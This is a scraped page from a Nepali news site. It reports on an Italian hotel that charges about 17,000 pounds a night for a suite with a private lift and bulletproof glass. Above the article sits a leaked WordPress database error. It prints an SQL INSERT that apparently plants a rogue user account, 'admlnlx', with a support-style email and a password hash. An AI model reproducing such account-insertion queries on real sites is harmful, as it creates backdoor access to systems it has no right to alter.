WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BDRyNPbO/DXAA.6EVDaw2BOEEMbE61/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-11 12:52:23', '', 'admlnlx', 'admlnlx')
एजेन्सी । होटलमा एक रात बिताएको कति रकम तिर्नुपर्ला ? होटलको स्तर अनुसार फरक-फरक हुन्छ । विश्वकै सुन्दर होटलको रुपमा लिइने इटालीको यो होटल देख्नमा जति सुन्दर छ, रात बिताउन पनि त्यस्तै महंगो छ । यस होटलमा एक रात बिताउन १७ हजार पाउण्ड अर्थात लगभग २७ लाख रुपैया तिर्नुपर्ने हुन्छ ।
यो होटल यति महंगो हुनुमा यसमा भएका केही विशेषताका कारण हुन् । यो होटलले अत्याधुनिक सेवा तथा सुविधा प्रदान गर्ने भएकोले अत्यधिक महंगो भएको हो । यस मूल्यभित्र सम्मेलन कक्ष, आफ्नो लागि छुट्टै लिफ्ट तथा चार वटा बेडरुम सामेल हुनेछन् । साथै यहाँ लगाइएका सिसाहरु बुलेट प्रुफ छन् ।
आफ्नो कोठामा जानका लागि भिन्दै लिफ्ट प्रयोग गर्न पाइने व्यवस्था छ ।